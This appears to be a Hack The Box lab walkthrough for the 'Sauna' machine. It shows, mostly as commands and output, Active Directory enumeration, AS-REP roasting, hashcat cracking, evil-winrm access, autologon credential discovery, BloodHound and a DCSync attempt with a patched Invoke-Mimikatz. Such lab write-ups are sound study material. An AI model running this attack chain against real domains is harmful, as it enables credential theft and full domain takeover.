This is a windows machine from hack the box.
# Nmap 7.94 scan initiated Fri Aug 25 01:40:28 2023 as: nmap -sV -sC -oA sauna 10.10.10.175
Nmap scan report for 10.10.10.175
Host is up (0.28s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Egotistical Bank :: Home
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-08-25 12:40:54Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-
First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-
First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2023-08-25T12:41:11
|_ start_date: N/A
|_clock-skew: 6h59m58s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Aug 25 01:41:59 2023 -- 1 IP address (1 host up) scanned in 91.07 seconds
- Enumerating SMB on port 445
┌──(kali㉿kali)-[~/HTB]
└─$ crackmapexec smb 10.10.10.175
[*] First time use detected
[*] Creating home directory structure
[*] Creating default workspace
[*] Initializing LDAP protocol database
[*] Initializing SMB protocol database
[*] Initializing MSSQL protocol database
[*] Initializing RDP protocol database
[*] Initializing FTP protocol database
[*] Initializing WINRM protocol database
[*] Initializing SSH protocol database
[*] Copying default configuration file
[*] Generating SSL certificate
SMB 10.10.10.175 445 SAUNA [*] Windows 10.0 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
Domain name is EGOTISTICAL-BANK.LOCA
Enumerating shares
└─$ crackmapexec smb 10.10.10.175 --shares
SMB 10.10.10.175 445 SAUNA [*] Windows 10.0 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
SMB 10.10.10.175 445 SAUNA [-] Error enumerating shares: STATUS_USER_SESSION_DELETED
┌──(kali㉿kali)-[~/HTB]
└─$ crackmapexec smb 10.10.10.175 --shares -u '' -p ''
[*] completed: 100.00% (1/1)
SMB 10.10.10.175 445 SAUNA [*] Windows 10.0 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
SMB 10.10.10.175 445 SAUNA [+] EGOTISTICAL-BANK.LOCAL\:
SMB 10.10.10.175 445 SAUNA [-] Error enumerating shares: STATUS_ACCESS_DENIED
┌──(kali㉿kali)-[~/HTB]
└─$ smbmap -H 10.10.10.175 -u ''
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator | Shawn Evans - [email protected]
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)
[!] Something weird happened: SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.) on line 947
Traceback (most recent call last):
File "/usr/bin/smbmap", line 33, in <module>
sys.exit(load_entry_point('smbmap==1.9.1', 'console_scripts', 'smbmap')())
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/smbmap/smbmap.py", line 1412, in main
host = [ host for host in share_drives_list.keys() ][0]
^^^^^^^^^^^^^^^^^^^^^^
AttributeError: 'bool' object has no attribute 'keys'
identified the machine as a Domain controler with the domain EGOTISTICAL-BANK.LOCAL0
Try rpcclient
┌──(kali㉿kali)-[~/HTB]
└─$ rpcclient 10.10.10.175 -U ''
Password for [WORKGROUP\]:
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
┌──(kali㉿kali)-[~/HTB]
└─$
Enumerating the web page on port 80. We see “The team” which will give us the possible users
Identified the users as
- Fergus smith
- Shaun Coins
- Sophie Driver
- Hugo Bear
- Bowie Taylor
- Steven Kerb
used chatGPT to generate possible usernames and created a txt file users.txt which will be a user list
Searching ldap to try abnd get usernames
┌──(kali㉿kali)-[~/HTB]
└─$ ldapsearch -x -H ldap://10.10.10.175 -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts
#
#
dn:
namingcontexts: DC=EGOTISTICAL-BANK,DC=LOCAL
namingcontexts: CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
namingcontexts: CN=Schema,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
namingcontexts: DC=DomainDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL
namingcontexts: DC=ForestDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
┌──(kali㉿kali)-[~/HTB]
└─$
ldapsearch part 2 but we did not get any usernames
┌──(kali㉿kali)-[~/HTB]
└─$ ldapsearch -x -H ldap://10.10.10.175 -b 'DC=EGOTISTICAL-BANK,DC=LOCAL' -s sub
# extended LDIF
#
# LDAPv3
# base <DC=EGOTISTICAL-BANK,DC=LOCAL> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#
# EGOTISTICAL-BANK.LOCAL
dn: DC=EGOTISTICAL-BANK,DC=LOCAL
objectClass: top
objectClass: domain
objectClass: domainDNS
distinguishedName: DC=EGOTISTICAL-BANK,DC=LOCAL
instanceType: 5
whenCreated: 20200123054425.0Z
whenChanged: 20230825072320.0Z
subRefs: DC=ForestDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL
subRefs: DC=DomainDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL
subRefs: CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
uSNCreated: 4099
dSASignature:: AQAAACgAAAAAAAAAAAAAAAAAAAAAAAAAQL7gs8Yl7ESyuZ/4XESy7A==
uSNChanged: 98336
name: EGOTISTICAL-BANK
objectGUID:: 7AZOUMEioUOTwM9IB/gzYw==
replUpToDateVector:: AgAAAAAAAAAGAAAAAAAAAEbG/1RIhXVKvwnC1AVq4o8WgAEAAAAAAOfn+
BoDAAAAq4zveNFJhUSywu2cZf6vrQzgAAAAAAAAKDj+FgMAAADc0VSB8WEuQrRECkAJ5oR1FXABAA
AAAADUbg8XAwAAAP1ahZJG3l5BqlZuakAj9gwL0AAAAAAAANDwChUDAAAAm/DFn2wdfEWLFfovGj4
TThRgAQAAAAAAENUAFwMAAABAvuCzxiXsRLK5n/hcRLLsCbAAAAAAAADUBFIUAwAAAA==
creationTime: 133374218005585776
forceLogoff: -9223372036854775808
lockoutDuration: -18000000000
lockOutObservationWindow: -18000000000
lockoutThreshold: 0
maxPwdAge: -36288000000000
minPwdAge: -864000000000
minPwdLength: 7
modifiedCountAtLastProm: 0
nextRid: 1000
pwdProperties: 1
pwdHistoryLength: 24
objectSid:: AQQAAAAAAAUVAAAA+o7VsIowlbg+rLZG
serverState: 1
uASCompat: 1
modifiedCount: 1
- Use a tool called kerbrute to try and identify valid user. You can use it to do a password spray without generating even code 4624 i.e quietly
- Eventcode 4624 – Event code 4624 corresponds to a log entry in the Windows security event log, and it indicates a successful logon event.It’s a crucial event for forensic analysts and security professionals as it provides evidence of successful logon activities. Monitoring for an unusually high number of 4624 events, especially in a short time frame or from unfamiliar locations, might indicate a potential security concern like brute-force attacks or unauthorized access.github
- Kebrute can be found https://github.com/ropnop/kerbrute
┌──(kali㉿kali)-[~/HTB/Sauna]
└─$ chmod +x kerbrute
┌──(kali㉿kali)-[~/HTB/Sauna]
└─$ ls
kerbrute sauna.gnmap sauna.nmap sauna.xml users.txt
┌──(kali㉿kali)-[~/HTB/Sauna]
└─$ ./kerbrute
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 08/25/23 - Ronnie Flathers @ropnop
This tool is designed to assist in quickly bruteforcing valid Active Directory accounts through Kerberos Pre-Authentication.
It is designed to be used on an internal Windows domain with access to one of the Domain Controllers.
Warning: failed Kerberos Pre-Auth counts as a failed login and WILL lock out accounts
Usage:
kerbrute [command]
Available Commands:
bruteforce Bruteforce username:password combos, from a file or stdin
bruteuser Bruteforce a single user's password from a wordlist
help Help about any command
passwordspray Test a single password against a list of users
userenum Enumerate valid domain usernames via Kerberos
version Display version info and quit
Flags:
--dc string The location of the Domain Controller (KDC) to target. If blank, will lookup via DNS
--delay int Delay in millisecond between each attempt. Will always use single thread if set
-d, --domain string The full domain to use (e.g. contoso.com)
-h, --help help for kerbrute
-o, --output string File to write logs to. Optional.
--safe Safe mode. Will abort if any user comes back as locked out. Default: FALSE
-t, --threads int Threads to use (default 10)
-v, --verbose Log failures and errors
Use "kerbrute [command] --help" for more information about a command.
┌──(kali㉿kali)-[~/HTB/Sauna]
- using kerbrute
┌──(kali㉿kali)-[~/HTB/Sauna]
└─$ ./kerbrute userenum --dc 10.10.10.175 -d EGOTISTICAL-BANK.LOCAL users.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 08/25/23 - Ronnie Flathers @ropnop
2023/08/25 06:39:06 > Using KDC(s):
2023/08/25 06:39:06 > 10.10.10.175:88
2023/08/25 06:39:07 > [+] VALID USERNAME: [email protected]
2023/08/25 06:39:07 > [+] VALID USERNAME: [email protected]
2023/08/25 06:39:08 > Done! Tested 57 usernames (2 valid) in 1.870 seconds
┌──(kali㉿kali)-[~/HTB/Sauna]
└─$
****
Use impacket
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ls
addcomputer.py getArch.py kintercept.py ntfs-read.py rpcdump.py smbserver.py
atexec.py Get-GPPPassword.py lookupsid.py ntlmrelayx.py rpcmap.py sniffer.py
changepasswd.py GetNPUsers.py machine_role.py ping6.py sambaPipe.py sniff.py
dcomexec.py getPac.py mimikatz.py ping.py samrdump.py split.py
dpapi.py getST.py mqtt_check.py psexec.py secretsdump.py ticketConverter.py
DumpNTLMInfo.py getTGT.py mssqlclient.py raiseChild.py services.py ticketer.py
esentutl.py GetUserSPNs.py mssqlinstance.py rbcd.py smbclient.py tstool.py
exchanger.py goldenPac.py net.py rdp_check.py smbexec.py wmiexec.py
findDelegation.py karmaSMB.py netview.py registry-read.py smbpasswd.py wmipersist.py
GetADUsers.py keylistattack.py nmapAnswerMachine.py reg.py smbrelayx.py wmiquery.py
Use impacket script GetNPusers.py. This is a tool from the Impacket suite, designed to exploit a misconfiguration in Active Directory that could allow an attacker to retrieve valid username and NTLM hashes from a domain, without having any account credentials initially.
Using GetNPusers.py. But fist we have to add to host file
Using GetNPusers.py tried on administrator and fsmith
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ./GetNPUsers.py EGOTISTICAL-BANK.LOCAL/administrator
Impacket v0.11.0 - Copyright 2023 Fortra
Password:
[*] Cannot authenticate administrator, getting its TGT
[-] User administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
on fsmith
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ./GetNPUsers.py EGOTISTICAL-BANK.LOCAL/fsmith
Impacket v0.11.0 - Copyright 2023 Fortra
Password:
[*] Cannot authenticate fsmith, getting its TGT
[email protected]:70311dacc7f5a33fcf57295a8fc26f5c$66be8037a4348d14299f81c374f5264f7bdde85c821ef83864e7afa14348a85aac6eb3ec4ed01392815fb12cc9fcb420e9c68d9169a4243fcee3412e3802910ced76fe5c03f6a6a66009a7d0a53ec889e43e08dd61cb3ec8abaa772f24249381551e53e695d9a3906569a0de98b4d755da5654bc6ec6fbb27ba896208078eb160bc0326d223fa3c763e6340d5e47b4bad4d508662a273296480d59b79b3fdff972fce916bdf04afcbaea487cb355301e3588f468ed33dbef6fb980e50ad974b03689e98811d97b9806acf95b4fcdf05cfed8401a1282a43cb834538a7548df6e0674cbca3e139de2088c2593109f858300e758a6cae98dfd0f947336b7c22fd4
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
We have the hash and now we use hashcat to try and crack it
used the command
./hashcat --example-hashes | grep asrep
./hashcat --example-hashes | less
then search asrep using / asrep
We get hashmode 18200
Hash mode #18200
Name................: Kerberos 5, etype 23, AS-REP
Category............: Network Protocol
Slow.Hash...........: No
Password.Len.Min....: 0
Password.Len.Max....: 256
Salt.Type...........: Embedded
Salt.Len.Min........: 0
Salt.Len.Max........: 256
Kernel.Type(s)......: pure, optimized
Example.Hash.Format.: plain
Example.Hash........: [email protected]:3e156ada591263b8a...102ac [Truncated, use --mach for full length]
Example.Pass........: hashcat
Benchmark.Mask......: ?b?b?b?b?b?b?b
Autodetect.Enabled..: Yes
Self.Test.Enabled...: Yes
Potfile.Enabled.....: Yes
Custom.Plugin.......: No
Plaintext.Encoding..: ASCII, HEX
Copy the hash into a file called sauna
└─$ cat sauna
[email protected]:70311dacc7f5a33fcf57295a8fc26f5c$66be8037a4348d14299f81c374f5264f7bdde85c821ef83864e7afa14348a85aac6eb3ec4ed01392815fb12cc9fcb420e9c68d9169a4243fcee3412e3802910ced76fe5c03f6a6a66009a7d0a53ec889e43e08dd61cb3ec8abaa772f24249381551e53e695d9a3906569a0de98b4d755da5654bc6ec6fbb27ba896208078eb160bc0326d223fa3c763e6340d5e47b4bad4d508662a273296480d59b79b3fdff972fce916bdf04afcbaea487cb355301e3588f468ed33dbef6fb980e50ad974b03689e98811d97b9806acf95b4fcdf05cfed8401a1282a43cb834538a7548df6e0674cbca3e139de2088c2593109f858300e758a6cae98dfd0f947336b7c22fd4
┌──(kali㉿kali)-[~/HTB/Sauna]
└─$
Run hashcat
┌──(kali㉿kali)-[/usr/bin]
└─$ ./hashcat -m 18200 /home/kali/HTB/Sauna/sauna /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
Get the password – Thestrokes23
[email protected]:70311dacc7f5a33fcf57295a8fc26f5c$66be8037a4348d14299f81c374f5264f7bdde85c821ef83864e7afa14348a85aac6eb3ec4ed01392815fb12cc9fcb420e9c68d9169a4243fcee3412e3802910ced76fe5c03f6a6a66009a7d0a53ec889e43e08dd61cb3ec8abaa772f24249381551e53e695d9a3906569a0de98b4d755da5654bc6ec6fbb27ba896208078eb160bc0326d223fa3c763e6340d5e47b4bad4d508662a273296480d59b79b3fdff972fce916bdf04afcbaea487cb355301e3588f468ed33dbef6fb980e50ad974b03689e98811d97b9806acf95b4fcdf05cfed8401a1282a43cb834538a7548df6e0674cbca3e139de2088c2593109f858300e758a6cae98dfd0f947336b7c22fd4:Thestrokes23
Run crackmapexec
┌──(kali㉿kali)-[/usr/bin]
└─$ crackmapexec smb 10.10.10.175 --shares -u fsmith -p Thestrokes23
SMB 10.10.10.175 445 SAUNA [*] Windows 10.0 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
SMB 10.10.10.175 445 SAUNA [+] EGOTISTICAL-BANK.LOCAL\fsmith:Thestrokes23
SMB 10.10.10.175 445 SAUNA [+] Enumerated shares
SMB 10.10.10.175 445 SAUNA Share Permissions Remark
SMB 10.10.10.175 445 SAUNA ----- ----------- ------
SMB 10.10.10.175 445 SAUNA ADMIN$ Remote Admin
SMB 10.10.10.175 445 SAUNA C$ Default share
SMB 10.10.10.175 445 SAUNA IPC$ READ Remote IPC
SMB 10.10.10.175 445 SAUNA NETLOGON READ Logon server share
SMB 10.10.10.175 445 SAUNA print$ READ Printer Drivers
SMB 10.10.10.175 445 SAUNA RICOH Aficio SP 8300DN PCL 6 We cant print money
SMB 10.10.10.175 445 SAUNA SYSVOL READ Logon server share
Try crackexec wrm (windows remote) which will tell us if we can get to the box which it does
┌──(kali㉿kali)-[/usr/bin]
└─$ crackmapexec winrm 10.10.10.175 -u fsmith -p Thestrokes23
SMB 10.10.10.175 5985 SAUNA [*] Windows 10.0 Build 17763 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL)
HTTP 10.10.10.175 5985 SAUNA [*] http://10.10.10.175:5985/wsman
WINRM 10.10.10.175 5985 SAUNA [+] EGOTISTICAL-BANK.LOCAL\fsmith:Thestrokes23 (Pwn3d!)
We use evil-winrm
┌──(kali㉿kali)-[/usr/bin]
└─$ evil-winrm -i 10.10.10.175 -u fsmith -p Thestrokes23
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\FSmith\Documents> cd..
*Evil-WinRM* PS C:\Users\FSmith> ls
Directory: C:\Users\FSmith
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 1/23/2020 10:01 AM Desktop
d-r--- 1/24/2020 10:40 AM Documents
d-r--- 9/15/2018 12:19 AM Downloads
d-r--- 9/15/2018 12:19 AM Favorites
d-r--- 9/15/2018 12:19 AM Links
d-r--- 9/15/2018 12:19 AM Music
d-r--- 9/15/2018 12:19 AM Pictures
d----- 9/15/2018 12:19 AM Saved Games
d-r--- 9/15/2018 12:19 AM Videos
*Evil-WinRM* PS C:\Users\FSmith> cd Desktop
*Evil-WinRM* PS C:\Users\FSmith\Desktop> ls
Directory: C:\Users\FSmith\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 8/25/2023 12:24 AM 34 user.txt
*Evil-WinRM* PS C:\Users\FSmith\Desktop> cat user.txt
d3e2c4cf72ed6d184ea0905f9f67ef1d
*Evil-WinRM* PS C:\Users\FSmith\Desktop>
Upload and run winPEAS
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\FSmith\Documents> upload /home/kali/HTB/Sauna/winPEASx64.exe
Info: Uploading /home/kali/HTB/Sauna/winPEASx64.exe to C:\Users\FSmith\Documents\winPEASx64.exe
Data: 3183956 bytes of 3183956 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\FSmith\Documents> ./winPEASx64.exe
The following credentials is of interest
ÉÍÍÍÍÍÍÍÍÍ͹ Looking for AutoLogon credentials
Some AutoLogon credentials were found
DefaultDomainName : EGOTISTICALBANK
DefaultUserName : EGOTISTICALBANK\svc_loanmanager
DefaultPassword : Moneymakestheworldgoround!
Check the domain user
*Evil-WinRM* PS C:\Users\FSmith\Documents> net user /domain svc_loanmgr
User name svc_loanmgr
Full Name L Manager
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 1/24/2020 4:48:31 PM
Password expires Never
Password changeable 1/25/2020 4:48:31 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon Never
Logon hours allowed All
Local Group Memberships *Remote Management Use
Global Group memberships *Domain Users
The command completed successfully.
*Evil-WinRM* PS C:\Users\FSmith\Documents>
We go for bloodhound
fist we install bloodhound
──(kali㉿kali)-[~]
└─$ sudo apt install bloodhound
[sudo] password for kali:
Sorry, try again.
[sudo] password for kali:
Download sharphound.exe from github https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors
upload sharphound and run it from the windows machine./s
*Evil-WinRM* PS C:\Users\FSmith\Documents> upload /home/kali/HTB/Sauna/SharpHound.exe
Info: Uploading /home/kali/HTB/Sauna/SharpHound.exe to C:\Users\FSmith\Documents\SharpHound.exe
Data: 1395368 bytes of 1395368 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\FSmith\Documents> ./SharpHound.exe
2023-08-25T13:19:26.1522551-07:00|INFORMATION|This version of SharpHound is compatible with the 4.3.1 Release of BloodHound
2023-08-25T13:19:26.3241396-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2023-08-25T13:19:26.3553912-07:00|INFORMATION|Initializing SharpHound at 1:19 PM on 8/25/2023
2023-08-25T13:19:26.5429038-07:00|INFORMATION|[CommonLib LDAPUtils]Found usable Domain Controller for EGOTISTICAL-BANK.LOCAL : SAUNA.EGOTISTICAL-BANK.LOCAL
2023-08-25T13:19:50.6366275-07:00|INFORMATION|Flags: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2023-08-25T13:19:50.8397517-07:00|INFORMATION|Beginning LDAP search for EGOTISTICAL-BANK.LOCAL
2023-08-25T13:19:50.9022664-07:00|INFORMATION|Producer has finished, closing LDAP channel
2023-08-25T13:19:50.9022664-07:00|INFORMATION|LDAP channel closed, waiting for consumers
download the zip file
*Evil-WinRM* PS C:\Users\FSmith\Documents> ls
Directory: C:\Users\FSmith\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 8/25/2023 1:20 PM 11690 20230825132046_BloodHound.zip
-a---- 8/25/2023 1:18 PM 1046528 SharpHound.exe
-a---- 8/25/2023 12:58 PM 2387968 winPEASx64.exe
-a---- 8/25/2023 1:20 PM 8601 ZDFkMDEyYjYtMmE1ZS00YmY3LTk0OWItYTM2OWVmMjc5NDVk.bin
*Evil-WinRM* PS C:\Users\FSmith\Documents> download 20230825132046_BloodHound.zip
Launch bloodhound
┌──(kali㉿kali)-[~/HTB/Sauna]
└─$ bloodhound
but before, we need to set the password
┌──(kali㉿kali)-[~/HTB/Sauna]
└─$ sudo neo4j console
Directories in use:
home: /usr/share/neo4j
config: /usr/share/neo4j/conf
logs: /etc/neo4j/logs
plugins: /usr/share/neo4j/plugins
import: /usr/share/neo4j/import
data: /etc/neo4j/data
certificates: /usr/share/neo4j/certificates
licenses: /usr/share/neo4j/licenses
run: /var/lib/neo4j/run
Starting Neo4j.
2023-08-25 13:25:56.918+0000 INFO Starting...
2023-08-25 13:25:57.564+0000 INFO This instance is ServerId{012fd76f} (012fd76f-f868-4f49-8648-df3c0a92529c)
2023-08-25 13:25:59.855+0000 INFO ======== Neo4j 4.4.16 ========
2023-08-25 13:26:04.131+0000 INFO Initializing system graph model for component 'security-users' with version -1 and status UNINITIALIZED
2023-08-25 13:26:04.154+0000 INFO Setting up initial user from defaults: neo4j
2023-08-25 13:26:04.155+0000 INFO Creating new user 'neo4j' (passwordChangeRequired=true, suspended=false)
2023-08-25 13:26:04.181+0000 INFO Setting version for 'security-users' to 3
2023-08-25 13:26:04.188+0000 INFO After initialization of system graph model component 'security-users' have version 3 and status CURRENT
2023-08-25 13:26:04.197+0000 INFO Performing postInitialization step for component 'security-users' with version 3 and status CURRENT
2023-08-25 13:26:04.656+0000 INFO Bolt enabled on localhost:7687.
2023-08-25 13:26:06.692+0000 INFO Remote interface available at http://localhost:7474/
2023-08-25 13:26:06.699+0000 INFO id: 09D349E0C9FBBE2765953B684D37451EC5B3E5498A047128F86F8D612D552499
2023-08-25 13:26:06.700+0000 INFO name: system
2023-08-25 13:26:06.700+0000 INFO creationDate: 2023-08-25T13:26:01.864Z
2023-08-25 13:26:06.700+0000 INFO Started.
Go to http://localhost:7474/ and change the password
login to bloodhond with tyhe username/password
Drag and drop the zip file to bloodhound
type svc at the top search. Then do the same for fsmith
mark svc and fsmith as owned
Go to queries, shortest path from owned principles
Click on Find prinicples with DCsync rights then rignt click on the link
we can use mimikazt for dcsync
We can try using mimikatz but impacket also has dcsync
option 1 – using mimikatz. Uploaded mimikatz to the windows machine. The mimikatz can be found in https://github.com/ParrotSec/mimikatz
This didnt work when running mimikatz.its stuck in a loop
using impacket — secretsdump.py
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ./secretsdump.py egotistical-bank.local/[email protected]
Impacket secretsdump.py failed numerous times with permission denied
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ./secretsdump.py egotistical-bank.local/[email protected]
Impacket v0.11.0 - Copyright 2023 Fortra
Password:
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[-] Cannot create "sessionresume_qmeaJHgo" resume session file: [Errno 13] Permission denied: 'sessionresume_qmeaJHgo'
[*] Something went wrong with the DRSUAPI approach. Try again with -use-vss parameter
[*] Cleaning up...
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
Gooing back to try the mimikatz route but this time using Invoke-Mimikatz.ps1
I got this from wget https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1 then uploaded it to the machine
┌──(kali㉿kali)-[~/HTB/Sauna]
└─$ wget https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1
--2023-08-27 06:29:42-- https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.108.133, 185.199.110.133, 185.199.111.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.108.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 677282 (661K) [text/plain]
Saving to: ‘Invoke-Mimikatz.ps1’
Invoke-Mimikatz.ps1 100%[===================================================================================================================>] 661.41K --.-KB/s in 0.07s
2023-08-27 06:29:42 (8.71 MB/s) - ‘Invoke-Mimikatz.ps1’ saved [677282/677282]
┌──(kali㉿kali)-[~/HTB/Sauna]
upload and run on the machine
There was issues running the Invoke -Mimikatz but found this article https://github.com/mitre/caldera/issues/38
Change the following line 886:
`$GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress')`
To
`$GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress', [reflection.bindingflags] "Public,Static", $null, [System.Reflection.CallingConventions]::Any, @((New-Object System.Runtime.InteropServices.HandleRef).GetType(), [string]), $null);`
When we used this it now worked. Use user svc_loanmgr
┌──(kali㉿kali)-[~/HTB/Sauna]
└─$ evil-winrm -i 10.10.10.175 -u svc_loanmgr -p Moneymakestheworldgoround!
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> ls
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> upload /home/kali/HTB/Sauna/Invoke-Mimikatz.ps1
Info: Uploading /home/kali/HTB/Sauna/Invoke-Mimikatz.ps1 to C:\Users\svc_loanmgr\Documents\Invoke-Mimikatz.ps1
Data: 3215032 bytes of 3215032 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> . .\Invoke-Mimikatz.ps1
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> Invoke-Mimikatz -Command '"lsadump::dcsync /domain:Egotistical-bank.local /user:Administrator"'
Access denied
At C:\Users\svc_loanmgr\Documents\Invoke-Mimikatz.ps1:2579 char:27
+ $Processors = Get-WmiObject -Class Win32_Processor
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (:) [Get-WmiObject], ManagementException
+ FullyQualifiedErrorId : GetWMIManagementException,Microsoft.PowerShell.Commands.GetWmiObjectCommand
The property 'AddressWidth' cannot be found on this object. Verify that the property exists.
At C:\Users\svc_loanmgr\Documents\Invoke-Mimikatz.ps1:2593 char:14
+ ... if ( ( $Processor.AddressWidth) -ne (([System.IntPtr]::Size)*8 ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], PropertyNotFoundException
+ FullyQualifiedErrorId : PropertyNotFoundStrict
Hostname: SAUNA.EGOTISTICAL-BANK.LOCAL / S-1-5-21-2966785786-3096785034-1186376766
.#####. mimikatz 2.1.1 (x64) built on Nov 12 2017 15:32:00
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
